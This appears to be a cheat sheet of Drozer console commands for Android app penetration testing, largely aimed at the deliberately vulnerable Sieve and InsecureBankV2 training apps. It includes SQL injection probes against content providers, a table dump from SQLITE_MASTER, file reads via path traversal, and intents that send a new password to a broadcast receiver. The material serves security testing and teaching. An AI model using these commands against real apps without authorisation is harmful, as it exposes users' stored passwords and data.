Drozer cheatsheet
Setup drozer
Android Penetration Tools Walkthrough Series: Drozer - Infosec Resources (infosecinstitute.com)
Get drozer shell
`adb forward tcp:31415 tcp:31415`
`drozer console connect`
Content Providers
- Get info from exposed content providers
run app.provider.info -a com.mwr.example.sieve
Note: content provider queries take the form content://name.of.package.class/declared_name
- Drozer can guess and try several URIs
run scanner.provider.finduris -a com.mwr.example.sieve
- Query Content Provider (database based)
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --vertical
- Update and delete content provider (database based) Exploiting Content Providers - HackTricks
- Manual SQL Injection test
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
- Manual SQL Lite Dump
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
- Automatic SQL Discovery
run scanner.provider.injection -a com.mwr.example.sieve
- Read Files
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
-
Automatic Path Traversal Discovery
run scanner.provider.traversal -a com.mwr.example.sieve
Permissions
- Examine Permissions and custom permissions
run app.package.info -a com.spotify.music
Deep links
-
pull invocable URIs(deep links/app links) from the AndroidManifest.xml file
-
Call deeplinks
run app.activity.start --action android.intent.action.VIEW --data-uri "sms://0123456789"
Exported IPC components
- Enumerate exported
run app.package.attacksurface com.mwr.example.sieve
- List exported content providers
run app.provider.finduri com.mwr.example.sieve
- List exported Activities
run app.activity.info -a com.mwr.example.sieve
- Launch Activity directly
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
- List exported services
run app.service.info -a com.mwr.example.sieve
- Interact with service
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 6345 7452 1 --extra string com.mwr.example.sieve.PASSWORD "abcdabcdabcdabcd" --bundle-as-obj
- List broadcast recivers
run app.broadcast.info -a com.android.insecurebankv2
- Send message to broadcast reciever
run app.broadcast.send --action theBroadcast --extra string phonenumber 07123456789 --extra string newpass 12345
- Sniff intents
run app.broadcast.sniff --action theBroadcast
Scan for all debuggable applications on a device
run app.package.debuggable